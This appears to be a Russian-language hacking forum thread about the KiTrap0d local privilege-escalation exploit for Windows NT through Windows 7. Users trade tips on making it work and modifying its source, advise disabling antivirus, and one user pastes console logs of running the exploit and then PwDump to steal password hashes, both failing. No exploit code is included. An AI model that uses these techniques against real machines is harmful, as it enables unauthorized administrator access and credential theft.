вот только автор забыл указать, что данный сплойт срабатывает не на всех windows, а лишь на мизерной их части
aladin1 пашет на всех nt это довольно много ,а именно: win nt,2000,xp,server 2003,vista,7,server 2008
мдеееее Легких путей не ищем!! а ведь все на много проще,админку можно получить без всяких сплоитов выполнив всего лишь одну команду! Читайте,учите батнька))
все там работает,на всех виндах что я перечислил. 1)дллка всегда должна быть в одной папке со сплоитом 2)возможно(!)что не будет работать ЕСЛИ отключены ветки msdos16 или wowexec , но по умолчанию этого нет.Скорее всего проверялось на кривых сборках где реестр крученный-перекрученный. 1)перепилить можно с добавлением исключения (при хард резете) на эту функцию:KernelGetProcByName 2)допилить virtuallock 3)Допилить проверку на включенность msdos16 и wowexec при выключенном-включать(если это позволено) 4)можно сделать чисто экзэшник без либы 5)сорцы на воле так что кто хочет(может)-дерзайте. у меня получилось заюзать на : win xp sp2 (чистая), winxp sp3 zver, win vista (чистая),win 7 (sp1) Есть еще один интересный сплоит повышающий привилегии ,причем актуальный на него ни заплаток ничего нету,но енто уже наверно потом обсудим.
попробовал на своей тачке, офнул авирь, запустился и все работает. может быть на той винде которая на виртуалке, установлен фикс на даную уязвимость?
от сплоита заплатки нету.Возможно это какая то "грязная сборка" по этому и не работает.проверь для начала сплоит.
на виртуалке стоит " Windows XP Professional SP3 Russian (VL) - (оригинальный + все обновления на 19.07.09)", а у меня как раз то "чуток грязная" винда. P.S. пардон за глупый вопрос, но как проверить сплоит?
походу не пашет Code: Microsoft Windows XP [Версия 5.1.2600] (С) Корпорация Майкрософт, 1985-2001. C:\Documents and Settings\admin>date 07-07-07 Клиент не обладает требуемыми правами. C:\Documents and Settings\admin>cd c:\ C:\>cd exploit C:\exploit>vdmallowed.exe -------------------------------------------------- Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit -------------------------------------------- [email protected] --- [+] Spawning a shell to give SYSTEM token (do not close it) [?] CreateProcess("C:\WINDOWS\SYSTEM32\CMD.EXE") => 1284 [?] GetVersionEx() => 5.1 [?] NtQuerySystemInformation() => \WINDOWS\system32\ntoskrnl.exe@804D7000 [?] Searching for kernel 5.1 signature { 64, a1, ... } ... [+] Signature found 0x32437 bytes from kernel base [+] Starting the NTVDM subsystem by launching MS-DOS executable [?] CreateProcess("C:\WINDOWS\SYSTEM32\DEBUG.EXE") => 384 [?] OpenProcess(384) => 0x7d0 [?] Injecting the exploit thread into NTVDM subsystem @0x7d0 [?] WriteProcessMemory(0x7d0, 0x2070000, "VDMEXPLOIT.DLL", 14); [?] WaitForSingleObject(0xc, INFINITE); [?] GetExitCodeThread(0xc, 0012FF44); => 0xc0000005 [!] The exploit thread returned an unexpected error, 0xc0000005 [+] Press any key to exit... выпрыгует еще одна консоль Code: Microsoft Windows XP [Версия 5.1.2600] (С) Корпорация Майкрософт, 1985-2001. C:\exploit>PwDump.exe localhost >> pass.txt pwdump6 Version 2.0.0-beta-2 by fizzgig and the mighty group at foofus.net ** THIS IS A BETA VERSION! YOU HAVE BEEN WARNED. ** Copyright 2009 foofus.net This program is free software under the GNU General Public License Version 2 (GNU GPL), you can redistribute it and/or modify it under the terms of the GNU GPL, as published by the Free Software Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS PROGRAM. Please see the COPYING file included with this program and the GNU GPL for further details. C:\exploit>type pass.txt Failed to open SCM C:\exploit>date 07-07-07- Клиент не обладает требуемыми правами. C:\exploit>